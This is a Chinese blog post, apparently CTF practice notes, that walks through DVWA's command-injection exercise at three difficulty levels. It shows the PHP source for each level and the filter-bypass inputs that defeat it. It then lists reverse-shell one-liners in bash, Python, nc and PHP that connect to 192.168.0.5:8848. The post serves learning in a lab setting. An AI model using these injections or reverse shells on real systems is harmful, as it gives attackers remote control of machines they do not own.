<!DOCTYPE html>
<html lang="zh-CN">





<head><meta name="generator" content="Hexo 3.9.0">
  <meta charset="UTF-8">
  <link rel="apple-touch-icon" sizes="76x76" href="/img/apple-touch-icon.png">
  <link rel="icon" type="image/png" href="/img/favicon.png">
  <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no, shrink-to-fit=no">
  <meta http-equiv="x-ua-compatible" content="ie=edge">
  <meta name="description" content="个人学习生活博客,寻志同道合朋友相互学习,共同进步.">
  <meta name="author" content="Cray">
  <meta name="keywords" content>
  <title>web渗透基础三 ~ CrayBlog</title>

  <link rel="stylesheet" href="/lib/font-awesome/css/all.min.css">
<link rel="stylesheet" href="/lib/bootstrap/css/bootstrap.min.css">
<link rel="stylesheet" href="/lib/mdbootstrap/css/mdb.min.css">
<link rel="stylesheet" href="/lib/github-markdown/github-markdown.min.css">
<link rel="stylesheet" href="https://at.alicdn.com/t/font_1067060_qzomjdt8bmp.css">


  <link rel="stylesheet" href="/lib/prettify/tomorrow-night-eighties.min.css">

<link rel="stylesheet" href="/css/main.css">


  <link rel="stylesheet" href="/lib/fancybox/jquery.fancybox.min.css">


  



</head>


<body>
  <header style="height: 70vh;">
    <nav id="navbar" class="navbar fixed-top  navbar-expand-lg navbar-dark scrolling-navbar">
  <div class="container">
    <a class="navbar-brand"
       href="/">&nbsp;<strong>CrayBlog</strong>&nbsp;</a>

    <button id="navbar-toggler-btn" class="navbar-toggler" type="button" data-toggle="collapse"
            data-target="#navbarSupportedContent"
            aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation">
      <div class="animated-icon"><span></span><span></span><span></span></div>
    </button>

    <!-- Collapsible content -->
    <div class="collapse navbar-collapse" id="navbarSupportedContent">
      <ul class="navbar-nav ml-auto text-center">
        
          
          
          <li class="nav-item">
            <a class="nav-link" href="/">Home</a>
          </li>
        
          
          
          <li class="nav-item">
            <a class="nav-link" href="/archives/">Archives</a>
          </li>
        
          
          
          <li class="nav-item">
            <a class="nav-link" href="/categories/">Categories</a>
          </li>
        
          
          
          <li class="nav-item">
            <a class="nav-link" href="/tags/">Tags</a>
          </li>
        
          
          
          <li class="nav-item">
            <a class="nav-link" href="/about/">About</a>
          </li>
        
        
          <li class="nav-item" id="search-btn">
            <a class="nav-link" data-toggle="modal" data-target="#modalSearch">&nbsp;&nbsp;<i
                class="iconfont icon-search"></i>&nbsp;&nbsp;</a>
          </li>
        
      </ul>
    </div>
  </div>


</nav>

    <div class="view intro-2" id="background"
         style="background: url('/img/default.png')no-repeat center center;
           background-size: cover;
           background-attachment: fixed;">
      <div class="full-bg-img">
        <div class="mask rgba-black-light flex-center">
          <div class="container text-center white-text fadeInUp">
            <span class="h2" id="subtitle">
              
            </span>

            
              <br>
              <p class="mt-3">星期二, 六月 11日 2019, 6:20 晚上</p>
            
          </div>

          
        </div>
      </div>
    </div>
  </header>

  <main>
    
      

<div class="container-fluid">
  <div class="row">
    <div class="d-none d-lg-block col-lg-2"></div>
    <div class="col-lg-8 nopadding-md">
      <div class="py-5 z-depth-3" id="board">
        <div class="post-content mx-auto" id="post">
          <div class="markdown-body">
            <h2 id="命令执行以及反弹shell姿势"><a href="#命令执行以及反弹shell姿势" class="headerlink" title="命令执行以及反弹shell姿势"></a>命令执行以及反弹shell姿势</h2><p>还是DVWA靶机的Command Injection</p>
<p>功能是在本地使用shell_exec执行ping命令</p>
<h3 id="Low"><a href="#Low" class="headerlink" title="Low"></a>Low</h3><pre><code>&lt;?php 

if( isset( $_POST[ &#39;Submit&#39; ]  ) ) { 
    // Get input 
    $target = $_REQUEST[ &#39;ip&#39; ]; 

    // Determine OS and execute the ping command. 
    if( stristr( php_uname( &#39;s&#39; ), &#39;Windows NT&#39; ) ) { 
        // Windows 
        $cmd = shell_exec( &#39;ping  &#39; . $target ); 
    } 
    else { 
        // *nix 
        $cmd = shell_exec( &#39;ping  -c 4 &#39; . $target );
    } 

    // Feedback for the end user 
    echo &quot;&lt;pre&gt;{$cmd}&lt;/pre&gt;&quot;; 
} 

?&gt; </code></pre><p>输入没有任何过滤，直接执行输入，这里要了解下<strong>命令链接符</strong><a href="https://www.cnblogs.com/Monarch-T/p/10388582.html" target="_blank" rel="noopener">参考</a></p>
<blockquote>
<p>&amp;&amp; :前一个指令执行成功，后面的指令才继续执行，就像进行与操作一样</p>
<p>|| :前一个命令执行失败，后面的才继续执行，类似于或操作</p>
<p>&amp; ：直接连接多个命令</p>
<p>| ：管道符，将前一个命令的输出作为下一个命令的输入</p>
<p>; ：直接连接多个命令</p>
</blockquote>
<p>我们尝试如下输入</p>
<p><code>127.0.0.1;ls</code></p>
<p>确实执行了我们的ls命令</p>
<h3 id="Medium"><a href="#Medium" class="headerlink" title="Medium"></a>Medium</h3><p>这里只贴添加的代码</p>
<pre><code>  $substitutions = array( 
        &#39;&amp;&amp;&#39; =&gt; &#39;&#39;, 
        &#39;;&#39;  =&gt; &#39;&#39;, 
    ); 

    // Remove any of the charactars in the array (blacklist). 
    $target = str_replace( array_keys( $substitutions ), $substitutions, $target );
</code></pre><p>添加了特定字符过滤，但是没过滤完整，也还是可以执行命令</p>
<p>如下命令都是可以执行的</p>
<pre><code>127.0.0.1&amp;ls
127.0.0.A|ls
127.0.0.A||ls</code></pre><h3 id="High"><a href="#High" class="headerlink" title="High"></a>High</h3><pre><code> $substitutions = array( 
        &#39;&amp;&#39;  =&gt; &#39;&#39;, 
        &#39;;&#39;  =&gt; &#39;&#39;, 
        &#39;| &#39; =&gt; &#39;&#39;,  # | 后面多了个空格，导致|没被过滤
        &#39;-&#39;  =&gt; &#39;&#39;, 
        &#39;$&#39;  =&gt; &#39;&#39;, 
        &#39;(&#39;  =&gt; &#39;&#39;, 
        &#39;)&#39;  =&gt; &#39;&#39;, 
        &#39;`&#39;  =&gt; &#39;&#39;, 
        &#39;||&#39; =&gt; &#39;&#39;, 
    ); 

    // Remove any of the charactars in the array (blacklist). 
    $target = str_replace( array_keys( $substitutions ), $substitutions, $target );
</code></pre><p>漏洞见注释</p>
<p>可以使用<code>127.0.0.A|ls</code>命令执行</p>
<h2 id="反弹shell"><a href="#反弹shell" class="headerlink" title="反弹shell"></a>反弹shell</h2><p>这里我也记录一下反弹shell<br><a href="https://www.freebuf.com/articles/system/178150.html" target="_blank" rel="noopener">参考</a></p>
<h3 id="linux文件描述符"><a href="#linux文件描述符" class="headerlink" title="linux文件描述符"></a>linux文件描述符</h3><p>linux文件描述符：linux shell下有三种标准的文件描述符，分别如下：</p>
<ul>
<li>0 - stdin 代表标准输入,使用&lt;或&lt;&lt;</li>
<li>1 - stdout 代表标准输出,使用&gt;或&gt;&gt;</li>
<li>2 - stderr 代表标准错误输出,使用2&gt;或2&gt;&gt;</li>
</ul>
<p>还有就是&gt;&amp;这个符号的含义，最好的理解是这样的：</p>
<ul>
<li>当&gt;&amp;后面接文件时，表示将标准输出和标准错误输出重定向至文件。</li>
<li>当&gt;&amp;后面接文件描述符时，表示将前面的文件描述符重定向至后面的文件描述符</li>
</ul>
<h3 id="反弹shell-1"><a href="#反弹shell-1" class="headerlink" title="反弹shell"></a>反弹shell</h3><p>开始之前都在本机开启一个监听，<code>nc -lnvp 8848</code></p>
<p><strong>注意：如果是对外网进行渗透，建议使用自己的服务器接收shell。否者可能会因为网关的nat导致连不上</strong></p>
<h4 id="linux机制版本"><a href="#linux机制版本" class="headerlink" title="linux机制版本"></a>linux机制版本</h4><p><code>bash -i &gt;&amp; /dev/tcp/192.168.0.5/8848 0&gt;&amp;1</code></p>
<h4 id="python-版本"><a href="#python-版本" class="headerlink" title="python 版本"></a>python 版本</h4><p><code>python -c &quot;import os,socket,subprocess;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((&#39;192.168.0.5&#39;,8848));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call([&#39;/bin/bash&#39;,&#39;-i&#39;]);&quot;</code></p>
<h4 id="nc-版本"><a href="#nc-版本" class="headerlink" title="nc 版本"></a>nc 版本</h4><p>需要被攻击机安装nc，一般其他shell都不行可以试试这个，最后搏一搏。</p>
<p><code>nc -e /bin/bash 192.168.0.5 8848</code></p>
<h4 id="php-版本"><a href="#php-版本" class="headerlink" title="php 版本"></a>php 版本</h4><p><code>php- &#39;exec(&quot;/bin/bash -i &gt;&amp; /dev/tcp/192.168.0.5/8848&quot;)&#39;</code></p>
<p><code>php -r &#39;$sock=fsockopen(&quot;192.168.0.5&quot;,8848);exec(&quot;/bin/bash -i 0&gt;&amp;3 1&gt;&amp;3 2&gt;&amp;3&quot;);&#39;</code></p>
<p>这里的3是代表之前创建的sock的文件描述符。</p>

            <hr>
          </div>
          <br>
          <div>
            
              <p>
                <i class="iconfont icon-inbox"></i>
                
                  <a class="hover-with-bg" href="/categories/CTF">CTF</a>
                  &nbsp;
                
              </p>
            
            <p>
              <i class="iconfont icon-tag"></i>
              
                <a class="hover-with-bg" href="/tags/DVWA">DVWA</a>
              
                <a class="hover-with-bg" href="/tags/php">php</a>
              
                <a class="hover-with-bg" href="/tags/linux">linux</a>
              
                <a class="hover-with-bg" href="/tags/%E5%8F%8D%E5%BC%B9shell">反弹shell</a>
              
              <span id="/2019/06/11/WEB温习第三天/" class="visitors leancloud_visitors" data-flag-title="web渗透基础三">
                <em id="visitors-text" class="post-meta-item-text"></em>
                <i id="visitors-count"></i>
              </span>
            </p>
            
              <p class="note note-warning">本博客所有文章除特别声明外，均采用 <a href="https://zh.wikipedia.org/wiki/Wikipedia:CC_BY-SA_3.0%E5%8D%8F%E8%AE%AE%E6%96%87%E6%9C%AC" rel="nofollow noopener">CC BY-SA 3.0协议</a> 。转载请注明出处！</p>
            
          </div>
        </div>
      </div>
    </div>
    <div class="d-none d-lg-block col-lg-2 toc-container">
      
  <div id="toc">
    <p class="h4"><i class="far fa-list-alt"></i>&nbsp;目录</p>
    <div id="tocbot"></div>
  </div>

    </div>
  </div>
</div>

<!-- custom -->


<!-- Comments -->
<div class="col-lg-7 mx-auto nopadding-md">
  <div class="container comments mx-auto" id="comments">
    
  </div>
</div>

    
  </main>

  
    <a class="z-depth-1" id="scroll-top-button" href="#" role="button">
      <i class="fa fa-chevron-up scroll-top-arrow" aria-hidden="true"></i>
    </a>
  

  
    <div class="modal fade" id="modalSearch" tabindex="-1" role="dialog" aria-labelledby="ModalLabel"
     aria-hidden="true">
  <div class="modal-dialog modal-dialog-scrollable modal-lg" role="document">
    <div class="modal-content">
      <div class="modal-header text-center">
        <h4 class="modal-title w-100 font-weight-bold">搜索</h4>
        <button type="button" id="local-search-close" class="close" data-dismiss="modal" aria-label="Close">
          <span aria-hidden="true">&times;</span>
        </button>
      </div>
      <div class="modal-body mx-3">
        <div class="md-form mb-5">
          <input type="text" id="local-search-input" class="form-control validate">
          <label data-error="x" data-success="v"
                 for="local-search-input">关键词</label>
        </div>
        <div class="list-group" id="local-search-result"></div>
      </div>
    </div>
  </div>
</div>
  

  <footer class="mt-5">
  <div class="text-center py-3">
    <a href="https://hexo.io" target="_blank" rel="nofollow noopener"><b>Hexo</b></a>
    <i class="iconfont icon-love"></i>
    <a href="https://github.com/fluid-dev/hexo-theme-fluid" target="_blank" rel="nofollow noopener"> <b>Fluid</b></a>
    <br>
    
  </div>
</footer>

<!-- SCRIPTS -->
<script src="/lib/jquery/jquery.min.js" ></script>
<script src="/lib/popper/popper.min.js" ></script>
<script src="/lib/bootstrap/js/bootstrap.min.js" ></script>
<script src="/lib/mdbootstrap/js/mdb.min.js" ></script>
<script src="/js/main.js" ></script>


  <script src="/js/lazyload.js" ></script>


  
    <script src="/lib/tocbot/tocbot.min.js" ></script>
  
  <script src="/js/post.js" ></script>


  <script src="/lib/prettify/prettify.min.js" ></script>
  <script>
    $(document).ready(function () {
      $('pre').addClass('prettyprint  linenums');
      prettyPrint();
    })
  </script>



  <script src="/lib/typed/typed.min.js" ></script>
  <script>
    var typed = new Typed('#subtitle', {
      strings: [
        '  ',
        "web渗透基础三&nbsp;",
      ],
      cursorChar: "_",
      typeSpeed: 70,
      loop: false,
    });
    typed.stop();
    $(document).ready(function () {
      $(".typed-cursor").addClass("h2");
      typed.start();
    });
  </script>



  <script src="/lib/anchor/anchor.min.js" ></script>
  <script>
    anchors.options = {
      placement: "right",
      visible: "false",
      
    };
    var el = "h1,h2,h3,h4,h5,h6".split(",");
    var res = [];
    for (item of el) {
      res.push(".markdown-body > " + item)
    }
    anchors.add(res.join(", "))
  </script>



  <script src="/js/local-search.js" ></script>
  <script>
    var path = "/local-search.xml";
    var inputArea = document.querySelector("#local-search-input");
    inputArea.onclick = function () {
      getSearchFile(path);
      this.onclick = null
    }
  </script>



  <script src="/lib/fancybox/jquery.fancybox.min.js" ></script>
  <script>
    $('#post').find('img').each(
      function () {
        var _this = $(this);
        var _src = _this.attr("src");
        _this.wrap('<a data-fancybox="images" href="' + _src + '" ></a>');
      }
    );
  </script>



  <script src="/lib/smooth-scroll/smooth-scroll.min.js" ></script>




</body>
</html>
